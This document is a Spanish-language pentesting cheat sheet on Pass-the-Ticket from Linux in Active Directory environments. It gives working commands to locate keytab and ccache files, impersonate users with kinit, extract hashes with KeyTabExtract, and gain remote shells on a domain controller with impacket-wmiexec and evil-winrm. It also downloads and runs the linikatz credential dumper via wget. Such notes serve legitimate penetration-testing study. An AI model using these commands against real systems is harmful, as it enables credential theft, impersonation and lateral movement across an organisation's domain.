Pass the Ticket (PtT) desde Linux - Keytabs, CCache y Movimiento Lateral

📌 Contexto


🔍 Identificar Integración con AD

1. Usando realm list

realm list

2. Procesos activos (SSSD o Winbind)

ps -ef | grep -i "winbind\|sssd"

🎯 Encontrar Tickets Kerberos

1. 🔑 KeyTab Files

find / -name *keytab* -ls 2>/dev/null

Pasted image 20250828192229.png

2. 📁 CCache Files

env | grep -i krb5  # Ver variable
ls -la /tmp         # Buscar archivos ccache

{40F628F0-4D3A-4C0E-B7EB-2CBFFF82C864}.png


⚡ Abusar de KeyTab Files

1. Listar información del KeyTab

klist -k -t /ruta/al/keytab.keytab

{C39469EC-FE7D-4FC2-9AB7-30CB538608C9}.png

2. Suplantar usuario con kinit

kinit usuario@DOMINIO.COM -k -t /ruta/al/keytab.keyta

3. Ver tickets actuales

klist

4. Acceder a recursos (ej. SMB)

smbclient //servidor/recurso -k -c ls

{47353B75-E95C-420E-B1AA-FFB825E38FA7}.png
{C04241AC-415A-4C20-A82F-A3E518CF4705}.png


🧪 Extraer Hashes de KeyTab

Usar KeyTabExtract

python3 keytabextract.py keytab.keytab

{5C2FE8D3-9EDB-424D-BB38-D72B51D48543}.png


🎫 Abusar de CCache Files

1. Copiar el archivo ccache

cp /tmp/krb5cc_647401106_YDzFNv /root/

2. Establecer variable de entorno

export KRB5CCNAME=/root/krb5cc_647401106_YDzFNv

3. Usar herramientas con Kerberos

smbclient //dc01/C$ -k -no-pass

{B7505492-9628-45DD-8759-70C611A93DA8}.png


🛠️ Herramientas con Soporte Kerberos

Una vez tienes un ticket válido (keytab/ccache/kirbi), puedes usarlo para moverte lateralmente dentro del dominio:

🔹 Impacket

proxychains impacket-wmiexec dc01 -k -no-pass

➡️ Esto te da una shell remota en el DC usando solo el ticket.

🔹 Evil-WinRM

proxychains evil-winrm -i dc01 -r DOMINIO.COM

➡️ Abres una sesión PowerShell en la máquina víctima usando el ticket Kerberos.

🔹 Convertir tickets (Linux ↔ Windows)

# De Linux (CCache) a Windows (KIRBI)
impacket-ticketConverter ticket.ccache ticket.kirbi  

# De Windows (KIRBI) a Linux (CCache)
impacket-ticketConverter ticket.kirbi ticket.ccache

🔓 Linikatz (Mimikatz para Linux)

wget https://raw.githubusercontent.com/CiscoCXSecurity/linikatz/master/linikatz.sh
chmod +x linikatz.sh
./linikatz.sh

📌 Consideraciones Importantes


🧠 Comandos Clave

Comando Explicación
realm list Ver información del dominio
klist -k -t keytab Ver entradas de un keytab
kinit user -k -t keytab Cargar keytab como ticket válido
export KRB5CCNAME=/ruta Usar ticket ccache
smbclient //srv/share -k Acceder a recurso SMB con Kerberos
impacket-wmiexec -k -no-pass Shell remota con ticket Kerberos
evil-winrm -i host -r dominio Sesión PowerShell con ticket Kerberos
ticketConverter Convertir entre CCache ↔ KIRBI